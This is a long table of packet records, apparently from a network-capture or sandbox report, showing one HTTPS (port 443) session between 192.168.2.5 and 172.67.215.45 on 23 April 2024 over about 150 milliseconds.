Apr 23, 2024 07:53:27.541080952 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.541124105 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.542104006 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.542121887 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.542196035 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.542217016 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.542259932 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.542259932 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.543762922 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.543780088 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.543840885 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.543873072 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.543905973 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.543926001 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.545466900 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.545484066 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.545541048 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.545557976 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.545612097 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.547343016 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.547363997 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.547414064 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.547429085 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.547461033 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.547482014 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.549019098 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.549036980 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.549112082 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.549128056 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.549180031 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.550143003 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.550159931 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.550209999 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.550218105 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.550261021 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.551743031 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.551760912 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.551815033 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.551822901 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.551862001 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.553442955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.553459883 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.553519964 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.553528070 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.553560972 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.555316925 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.555341959 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.555393934 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.555402040 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.555438995 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.556391954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.556416035 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.556467056 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.556474924 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.556513071 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.557949066 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.557966948 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.558017015 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.558026075 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.558051109 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.558064938 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.559858084 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.559875011 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.559930086 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.559938908 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.559976101 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.561444998 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.561464071 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.561511993 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.561520100 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.561554909 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.563083887 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.563106060 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.563158035 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.563167095 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.563210964 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.564251900 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.564291000 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.564320087 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.564327002 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.564356089 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.564363956 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.566020966 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.566036940 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.566107035 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.566117048 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.566157103 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.567667007 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.567737103 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.567744970 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.567759037 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.567796946 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.569360971 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.569379091 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.569454908 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.569463968 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.569504023 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.615041018 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.615057945 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.615166903 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.615189075 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.615236998 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.616321087 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.616337061 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.616472960 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.616481066 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.616525888 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.618053913 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.618071079 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.618150949 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.618159056 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.618201017 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.619690895 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.619709015 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.619781017 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.619791031 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.619843960 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.621323109 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.621340036 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.621411085 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.621419907 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.621454954 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.622591972 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.622607946 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.622689962 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.622708082 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.622767925 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.624412060 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.624428988 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.624486923 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.624501944 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.624536037 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.625996113 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.626012087 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.626076937 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.626086950 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.626154900 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.627669096 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.627685070 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.627757072 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.627757072 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.627767086 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.627805948 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.629601955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.629617929 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.629679918 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.629690886 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.629728079 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.631194115 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.631211996 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.631304026 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.631313086 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.631350994 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.632554054 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.632570982 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.632636070 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.632646084 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.632690907 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.634255886 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.634272099 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.634334087 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.634346008 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.634382010 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.635935068 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.635977030 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.636059999 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.636069059 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.636080980 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.636109114 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.641433954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.641449928 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.641530037 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.641552925 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.641606092 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.648904085 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.648920059 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.648993015 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.649002075 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.649040937 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.650933981 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.650950909 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.651029110 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.651036978 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.651082039 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.652215004 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.652230978 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.652287006 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.652296066 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.652332067 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.653537035 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.653558016 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.653603077 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.653613091 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.653629065 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.653642893 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.655082941 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.655098915 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.655175924 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.655185938 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.655225039 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.656114101 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.656128883 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.656183958 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.656191111 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.656225920 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.657061100 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.657078981 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.657128096 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.657135963 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.657217026 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.657975912 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.657993078 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.658041954 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.658049107 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.658087015 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.658780098 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.658795118 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.658848047 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.658855915 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.658891916 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.659598112 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.659614086 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.659661055 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.659667969 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.659703016 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.660558939 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.660574913 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.660633087 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.660640955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.660681009 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.661633015 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.661648989 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.661711931 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.661716938 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.661757946 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.662880898 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.662897110 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.662950039 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.662955046 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.662991047 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.664288998 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.664304018 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.664347887 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.664355993 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.664374113 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.664395094 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.665328026 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.665344000 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.665399075 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.665405989 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.665442944 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.666423082 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.666440010 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.666495085 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.666502953 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.666538000 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.667308092 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.667325974 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.667377949 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.667385101 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.667419910 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.668210983 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.668226957 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.668277025 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.668284893 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.668319941 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.669397116 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.669413090 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.669462919 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.669470072 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.669507980 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.670721054 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.670737028 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.670792103 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.670799017 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.670835972 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.672130108 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.672147036 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.672197104 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.672203064 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.672240019 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.673475981 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.673491955 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.673544884 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.673552990 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.673589945 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.674874067 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.674890041 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.674943924 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.674952984 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.674988985 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.676107883 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.676122904 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.676167965 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.676177025 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.676199913 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.676219940 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.677683115 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.677699089 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.677795887 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.677803993 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.677848101 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.679043055 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.679059029 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.679104090 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.679112911 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.679148912 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.680421114 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.680437088 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.680526018 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.680532932 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.680574894 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.681848049 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.681864023 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.681916952 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.681925058 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.681962967 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.683181047 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.683196068 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.683249950 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.683259964 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.683299065 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.684361935 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.684412956 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.684423923 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.684429884 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.684458017 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.684477091 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.686021090 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.686037064 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.686083078 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.686090946 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.686127901 CEST	49729	443	192.168.2.5	172.67.215.45
